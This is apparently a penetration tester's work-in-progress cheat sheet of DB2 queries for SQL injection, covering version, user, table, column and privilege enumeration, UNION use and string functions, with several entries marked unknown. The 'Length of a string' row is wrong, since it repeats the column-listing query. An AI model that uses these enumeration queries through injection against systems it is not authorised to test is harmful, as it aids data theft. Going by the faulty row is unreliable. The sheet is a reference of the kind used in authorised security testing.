Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though it pays to be prepared...
Below are some tabulated notes on how to do many of thing you'd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.
Description | SQL / Comments |
Comments | select blah from foo; -- comment like this |
Batching Queries Allowed? | ??? |
Database Version | select versionnumber, version_timestamp from sysibm.sysversions; |
Current Database User | select user from sysibm.sysdummy1; |
System User for Current Connection | select system_user from sysibm.sysdummy1; |
Current Database | select current server from sysibm.sysdummy1; |
Limiting Rows Returned | SELECT foo FROM bar fetch first 1 rows only; |
Returning N Rows starting at Offset M | select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; |
List Tables | select name from sysibm.systables; |
List Columns | select name, tbname, coltype from sysibm.syscolumns; |
List Databse Users and Passwords | Database authorities (like roles, I think) can be listed like this: select grantee from syscat.dbauth; |
FROM clause mandated in SELECTs? | Yes, use sysibm.sysdummy1: select 123 from sysibm.sysdummy1; |
UNION supported | Yes select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1; |
Enumerate Tables Privs | select * from syscat.tabauth; |
Enumerate Current Privs | select * from syscat.dbauth where grantee = current user; select * from syscat.tabauth where grantee = current user; |
Length of a string | select name, tbname, coltype from sysibm.syscolumns; -- returns 3 |
Bitwise AND | This page seems to indicate that DB2 has no support for bitwise operators! |
Substring | SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b |
ASCII value of a character | select ascii('A') from sysibm.sysdummy1; -- returns 65 |
Character from ASCII value | select chr(65) from sysibm.sysdummy1; -- returns 'A' |
Roles and passwords | N/A (I think DB2 uses OS-level user accounts for authentication.) |
List Database Procedures | ??? |
Create Users + Granting Privs | ??? |
Time Delays | ??? |
Execute OS Commands | ??? |
Write to File System | ??? |
Concatenation | SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc' select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab' |
Casting | SELECT cast('123' as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1; |
List schemas | SELECT schemaname FROM syscat.schemata; |
This page will probably remain a work-in-progress for some time yet. I'll update it as I learn more.
